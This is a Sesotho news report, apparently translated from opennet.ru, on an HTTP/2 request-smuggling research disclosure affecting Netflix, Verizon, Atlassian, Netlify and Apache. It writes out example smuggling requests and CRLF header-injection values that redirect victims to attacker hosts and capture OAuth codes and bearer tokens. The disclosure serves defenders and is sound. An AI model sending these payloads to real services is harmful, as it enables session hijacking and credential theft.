Sistimi ea marang-rang eo pheletso e ka pele e amohelang likhokahano ka HTTP/2 ebe e e fetisetsa ho backend ka HTTP/1.1 e pepesitsoe mofuta o mocha oa tlhaselo ea "HTTP Request Smuggling", e lumellang, ka ho romella likopo tsa bareki tse etselitsoeng ka ho khetheha. kena ka har'a likahare tsa likopo tse tsoang ho basebelisi ba bang tse sebetsitsoeng ka tsela e ts'oanang lipakeng tsa frontend le backend. Tlhaselo e ka sebelisoa ho kenya khoutu e mpe ea JavaScript lenaneong le nang le sebaka sa marang-rang se molaong, lits'ebetso tse thibelang phihlello le ho thibela liparamente tsa netefatso.
Bothata bo ama li-proxies tsa marang-rang, li-balancers tsa mojaro, li-accelerator tsa marang-rang, mekhoa ea ho fana ka litaba le litlhophiso tse ling tseo likōpo li lebisoang ho tsona ka mokhoa o ka pele-ho-backend. Mongoli oa thuto o bontšitse monyetla oa ho hlasela litsamaiso tsa Netflix, Verizon, Bitbucket, Netlify CDN le Atlassian, 'me a fumana lidolara tse likete tse 56 ka mananeo a moputso bakeng sa ho khetholla bofokoli. Bothata bo boetse bo netefalitsoe lihlahisoa tsa F5 Networks. Bothata bo ama ka mokhoa o itseng mod_proxy ho seva sa Apache http (CVE-2021-33193), tokiso e lebelletsoe ho mofuta oa 2.4.49 (bahlahisi ba ile ba tsebisoa ka bothata qalong ea Mots'eanong mme ba fuoa likhoeli tse 3 ho e lokisa). Ho nginx, bokhoni ba ho hlakisa ka nako e le 'ngoe lihlooho tsa "Content-Length" le "Transfer-Encoding" li ne li thibetsoe tokollong ea ho qetela (1.21.1). Lisebelisoa tsa tlhaselo li se li kenyelelitsoe ho Burp toolkit 'me li fumaneha ka mokhoa oa katoloso ea Turbo Intruder.
Molao-motheo oa ts'ebetso ea mokhoa o mocha oa ho kenya likopo tsa sephethephethe o ts'oana le ts'oenyeho e boletsoeng ke mofuputsi a le mong lilemong tse peli tse fetileng, empa e lekanyelitsoe ho li-frontend tse amohelang likopo ho feta HTTP/1.1. A re hopoleng hore morerong oa frontend-backend, likōpo tsa bareki li amoheloa ke node e eketsehileng - e ka pele, e thehang kamano ea nako e telele ea TCP le backend, e sebetsanang ka ho toba le likōpo. Ka khokahano ena e tloaelehileng, hangata likopo tse tsoang ho basebelisi ba fapaneng li fetisoa, tse latelang ketane ka mor'a e 'ngoe, e arohanngoa ka protocol ea HTTP.
Tlhaselo ea khale ea "HTTP Request Smuggling" e ne e ipapisitse le taba ea hore batho ba ka pele le ba ka morao ba toloka tšebeliso ea lihlooho tsa HTTP "Content-Length" (e lekanyetsa boholo ba lintlha tse kopong) le "Transfer-Encoding: chunked" (e lumella. data e tla fetisoa ka likarolo) ka tsela e fapaneng. . Ka mohlala, haeba karolo e ka pele e tšehetsa feela "Content-Length" empa e hlokomoloha "Transfer-Encoding: chunked", mohlaseli a ka romela kopo e nang le lihlooho tsa "Content-Length" le "Transfer-Encoding: chunked", empa boholo ke "Content-Length" ha e tsamaellane le boholo ba ketane e khaotsoeng. Tabeng ena, sebaka se ka pele se tla sebetsa le ho tsamaisa kopo hape ho latela "Content-Length", 'me mokokotlo o tla emela ho phethoa ha block ho ipapisitsoe le "Transfer-Encoding: chunked" le mohatla o setseng oa kopo ea mohlaseli. e be qalong ya kopo ya motho emong e fetisoang kamorao ho moo.
Ho fapana le protocol ea mongolo HTTP/1.1, e arotsoeng boemong ba mohala, HTTP/2 ke protocol ea binary mme e laola li-block tsa data tsa boholo bo boletsoeng esale pele. Leha ho le joalo, HTTP/2 e sebelisa lihlooho tsa pseudo tse lumellanang le lihlooho tse tloaelehileng tsa HTTP. Tabeng ea ho sebelisana le backend ka HTTP/1.1 protocol, frontend e fetolela lihlooho tsena tsa pseudo ho lihlooho tse tšoanang tsa HTTP HTTP/1.1. Bothata ke hore backend e etsa liqeto mabapi le ho arola molatsoana ho latela lihlooho tsa HTTP tse behiloeng ke frontend, ntle le ho ba le tlhahisoleseling mabapi le liparamente tsa kopo ea mantlha.
Haholo-holo, boleng "bolelele ba dikahare" le "transfer-encoding" bo ka fetisoa ka mokhoa oa lihlooho tsa pseudo, ho sa tsotellehe hore ha li sebelisoe ho HTTP / 2, kaha boholo ba lintlha tsohle bo lekantsoe. tšimong e arohaneng. Leha ho le joalo, nakong ea ts'ebetso ea ho fetolela kopo ea HTTP/2 ho HTTP/1.1, lihlooho tsena li fetisoa mme li ka ferekanya backend. Ho na le mefuta e 'meli ea litlhaselo tse kholo: H2.TE le H2.CL, moo mokokotlo o khelosoang ke phetiso e fosahetseng-encoding kapa boleng ba bolelele ba dikahare bo sa tsamaellaneng le boholo ba 'mele oa kopo o amohetsoeng ke frontend ka HTTP/2 protocol.
Mohlala oa tlhaselo ea H2.CL ke ho hlakisa boholo bo fosahetseng sehloohong sa pseudo-bolelele ha o romela kopo ea HTTP/2 ho Netflix. Kopo ena e lebisa ho kenyelletsoeng ha sehlooho se ts'oanang sa HTTP Content-Length ha u fihlella backend ka HTTP/1.1, empa kaha boholo ba Content-Length bo hlalositsoe ka tlase ho ea 'nete, karolo ea data e mohatleng e sebetsoa joalo ka qalo ya kopo e latelang.
Mohlala, kopa HTTP/2 :mokhoa POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
E tla fella ka hore kopo e romelloe ho backend: POST /n HTTP/1.1 Host: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
Kaha Content-Length e na le boleng ba 4, backend e tla amohela feela "abcd" e le 'mele oa kopo,' me karolo e setseng ea "GET /n HTTP/1.1..." e tla sebetsoa e le qalo ea kopo e latelang. e amanang le mosebelisi e mong. Ka hona, molapo o tla felloa ke matla 'me ka lebaka la kopo e latelang, sephetho sa ho sebetsa kopo ea dummy se tla fanoa. Tabeng ea Netflix, ho hlakisa moamoheli oa mokha oa boraro ho "Host:" hlooho ka kopo ea dummy ho entse hore moreki a khutlise karabo "Location: https://02.rs?x.netflix.com/n" le e lumelletsoe ho romelloa litaba tse sa reroang ho moreki, ho kenyelletsa Matha khoutu ea hau ea JavaScript maemong a sebaka sa Netflix.
Khetho ea bobeli ea tlhaselo (H2.TE) e kenyelletsa ho kenya hlooho ea "Transfer-Encoding: chunked". Tšebeliso ea pseudo-header ea phetisetso ho HTTP/2 e thibetsoe ke litlhaloso mme likopo tse nang le eona li laetsoe hore li tšoaroe e le tse fosahetseng. Leha ho le joalo, lits'ebetso tse ling tsa pele ha li nahane ka tlhoko ena mme li lumella ts'ebeliso ea pseudo-header ea phetisetso ho HTTP/2, e fetoloang hlooho e tšoanang ea HTTP. Haeba ho na le hlooho ea "Transfer-Encoding", backend e ka e nka e le ea bohlokoa ka ho fetisisa 'me ea arola karoloana ea data ka likotoana ka "chunked" mode ho sebelisa li-blocks tsa boholo bo fapaneng ka mokhoa oa "{size}\r\n{block }\r\n{size} \r\n{block}\r\n0", ho sa tsotellehe karohano ea pele ka boholo ba kakaretso.
Ho ba teng ha lekhalo le joalo ho ile ha bontšoa ke mohlala oa Verizon. Bothata bo ne bo amana le portal ea netefatso le sistimi ea taolo ea litaba, e sebelisoang hape libakeng tse kang Huffington Post le Engadget. Mohlala, kopo ea moreki ka HTTP/2: :mokhoa POST :path /identitfy/XUI :authority id.b2b.oath.com transfer-encoding chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x=
Sephetho sa ho romela kopo ea HTTP/1.1 ho backend: POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Host: psres. net Content- Bolelele: 10x=
Karolo e ka morao, e ile ea hlokomoloha sehlooho sa "Content-Length" mme ea etsa karohano e thehiloeng ho "Transfer-Encoding: chunked". Ha e le hantle, tlhaselo e entse hore ho khonehe ho khutlisetsa likopo tsa basebelisi sebakeng sa bona sa marang-rang, ho kenyelletsa le ho amohela likopo tse amanang le netefatso ea OAuth, litekanyo tsa tsona li bonts'itsoeng sehloohong sa Referer, hammoho le ho etsisa seboka sa netefatso le ho etsa hore sistimi ea mosebelisi e romele lintlha. ho motho ya hlasetseng. FUMANA /b2blanding/show/oops HTTP/1.1 Host: psres.net Referer: https://id.b2b.oath.com/?…&code=secret GET / HTTP/1.1 Host: psres.net Tumello: Bearer eyJhcGwiOiJIUzI1GiCI1sIkInR6…
Ho hlasela lits'ebetso tsa HTTP/2 tse sa lumelleng pseudo-header ea phetisetso hore e hlalosoe, ho hlahisitsoe mokhoa o mong o kenyelletsang ho beha hlooho ea "Transfer-Encoding" ka ho e hokela ho lihlooho tse ling tsa pseudo tse arotsoeng ke sebapali se secha. ha e fetoleloa ho HTTP/1.1 tabeng ena e theha lihlooho tse peli tse arohaneng tsa HTTP).
Ka mohlala, Atlassian Jira le Netlify CDN (e neng e sebelisoa ho sebeletsa leqephe la ho qala la Mozilla ho Firefox) ba anngoe ke bothata bona. Ka ho khetheha, kopo ea HTTP/2 :mokhoa POST :path / :authority start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Host : evil-netlify-domain\r\n Content-Length: 5\r\n \r\nx=
e entse hore kopo ea HTTP/1.1 POST / HTTP/1.1 e romelloe ho backend\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r \nx=
Kgetho e 'ngoe ea ho kenya hlooho ea "Transfer-Encoding" e ne e le ho e hokela lebitsong la hlooho e 'ngoe ea pseudo kapa moleng o nang le mokhoa oa kopo. Mohlala, ha o kena ho Atlassian Jira, lebitso la pseudo-header "foo: bar\r\ntransfer-encoding" le boleng "chunked" le entse hore lihlooho tsa HTTP "foo: bar" le "transfer-encoding: chunked" li kenyeletsoe. , le ho hlakisa pseudo-header ":mokhoa" boleng "GET / HTTP/1.1\r\nTransfer-encoding: chunked" e fetoletsoe ho "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Mofuputsi ea hlokometseng bothata o boetse a fana ka tlhahiso ea mokhoa oa ho etsa kopo ea ho hlasela li-frontends, moo aterese e 'ngoe le e' ngoe ea IP e thehang khokahanyo e arohaneng le backend le sephethephethe se tsoang ho basebelisi ba fapaneng ha se kopane. Mokhoa o reriloeng ha o lumelle ho kena-kenana le likopo tsa basebelisi ba bang, empa o etsa hore ho khonehe ho chefo cache e arolelanoang e amang ts'ebetso ea likopo tse ling, 'me e lumella ho nkeloa sebaka ha lihlooho tsa ka hare tsa HTTP tse sebelisetsoang ho fetisetsa tlhahisoleseding ea tšebeletso ho tloha ka pele ho ea ka morao ( mohlala, ha u netefatsa ka lehlakoreng le ka pele ho Lihlooho tse joalo li ka fetisetsa tlhahisoleseding e mabapi le mosebedisi oa hona joale ho ea ka morao). E le mohlala oa ho sebelisa mokhoa oa ts'ebetso, ho sebelisa chefo ea cache, ho ne ho ka khoneha ho fumana taolo holim'a maqephe a tšebeletso ea Bitbucket.
Source: opennet.ru